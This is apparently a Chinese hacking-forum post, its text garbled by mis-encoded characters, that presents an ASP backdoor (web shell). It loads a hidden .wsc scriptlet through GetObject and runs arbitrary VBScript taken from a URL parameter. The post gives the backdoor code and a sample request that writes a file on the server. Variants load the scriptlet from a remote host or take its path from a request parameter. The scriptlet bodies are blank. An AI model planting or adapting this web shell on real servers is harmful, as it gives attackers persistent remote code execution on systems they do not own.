ScriptCodingInfo.wsc代碼如下，該文件可以改成任意后綴：

以下是引用片段：
 
 
 
 
 
 
 
 
 

backdoor.asp內(nèi)容如下：

以下是引用片段：
<% 
b=request("a") 
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop") 
fs.lcx(b) 
%>

調(diào)用方法如下：

以下是引用片段：
http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").
OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")

注意這里的a=只能是vbs的代碼，不可以接受像response、request之類的asp的東東。如果是2000服務(wù)器可以在backdoor.asp遠(yuǎn)程調(diào)用ScriptCodingInfo.wsc，像Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop")

2003服務(wù)器中不可以。算一個(gè)思路，雞肋，誰(shuí)有更好的辦法完善，能夠直接調(diào)用cs的asp木馬的c端就好了。
#p#

突然看到了lcx巨形牛頭人發(fā)了一個(gè)帖子
http://hi.baidu.com/myvbscript/blog/item/62e6204e4805dacdd0c86a6a.html
但是就像牛頭人所說(shuō)的，沒(méi)有加進(jìn)request和response類很不爽。于是我作了一個(gè)簡(jiǎn)單的修改。

ScriptCodingInfo.wsc 代碼

以下是引用片段：
 
 
 
 
 
 
 
 
 

test.asp代碼：

<% 
b=request("a") 
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop") 
fs.lcx b,request,response 
%>

測(cè)試方法：

以下是引用片段：

不知道這是不是lcx巨形牛頭人所說(shuō)的那個(gè)c端。我一直不太理解“能夠直接調(diào)用cs的asp木馬的c端就好了”lcx巨牛的這句話的意思
如果改成
Set fs = GetObject(request("b"))
然后用

以下是引用片段：
wsc%23haiyangtop&c=phpeval

這樣好象更有誘惑性。

【編輯推薦】

1. 4.1.7 使用SQLRootKit網(wǎng)頁(yè)數(shù)據(jù)庫(kù)后門(mén)控制案例
2. 入侵Windows2000系統(tǒng)放置后門(mén)的方法
3. Linux下的后門(mén)和日志工具